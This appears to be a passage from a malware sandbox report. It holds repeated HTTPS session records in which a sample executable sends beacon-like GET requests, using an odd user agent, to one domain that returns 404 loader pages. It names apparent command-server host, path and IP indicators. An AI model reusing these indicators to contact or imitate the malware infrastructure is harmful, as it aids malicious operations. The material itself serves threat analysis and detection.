                2022-08-05 13:08:30 UTC7INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                70192.168.2.449847199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:04 UTC67OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:04 UTC67INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:04 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:04 UTC67INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                71192.168.2.449848199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:05 UTC68OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:05 UTC68INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:05 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:05 UTC68INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                72192.168.2.449849199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:06 UTC69OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:07 UTC69INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:06 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:07 UTC69INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                73192.168.2.449850199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:07 UTC70OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:08 UTC70INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:08 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:08 UTC70INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                74192.168.2.449852199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:09 UTC71OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:09 UTC71INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:09 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:09 UTC71INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                75192.168.2.449853199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:09 UTC72OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:10 UTC72INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:10 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:10 UTC72INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                76192.168.2.449854199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:11 UTC73OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:11 UTC73INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:11 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:11 UTC73INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                77192.168.2.449855199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:12 UTC74OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:12 UTC74INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:12 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:12 UTC74INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                78192.168.2.449856199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:13 UTC75OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:13 UTC75INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:13 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:13 UTC75INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                79192.168.2.449857199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:14 UTC76OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:14 UTC76INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:14 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:14 UTC76INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                8192.168.2.449763199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:31 UTC7OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:31 UTC7INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:31 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:31 UTC8INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                80192.168.2.449858199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:15 UTC77OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:15 UTC77INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:15 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:15 UTC77INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                81192.168.2.449859199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:16 UTC78OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:16 UTC78INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:16 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:16 UTC78INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                82192.168.2.449860199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
